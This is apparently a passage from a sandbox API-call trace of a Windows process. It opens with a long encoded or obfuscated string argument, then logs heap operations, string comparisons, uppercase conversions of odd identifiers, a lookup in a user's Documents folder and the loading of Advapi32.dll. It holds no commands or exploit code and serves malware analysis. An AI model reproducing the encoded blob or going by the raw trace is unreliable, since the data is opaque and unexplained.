\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0264.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0264.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0264.708] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0264.708] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.708] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0264.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0264.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Shapes", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Shapes", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Shapes", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Shapes", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hapes", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0264.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0264.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.709] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0264.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Shapes", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Shapes", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Shapes", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0264.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Shapes", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0264.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0264.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.710] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.710] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0264.710] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0264.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0264.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0264.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0264.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0264.710] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0264.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0264.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0264.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0264.711] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0264.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0264.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0264.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0264.711] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0264.711] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.711] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0264.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.711] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0264.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.711] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.712] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.712] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/My Shapes", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa670047, dwReserved1=0x2731e, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 0xaa57a0 [0264.712] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0264.712] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.712] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0264.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.712] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0264.712] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0264.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0264.713] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0264.713] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.713] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0264.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0264.713] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.713] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0264.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.714] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.714] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.714] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0264.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.714] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0264.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.714] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0264.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0264.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0264.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.715] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.715] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0264.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.715] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0264.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: 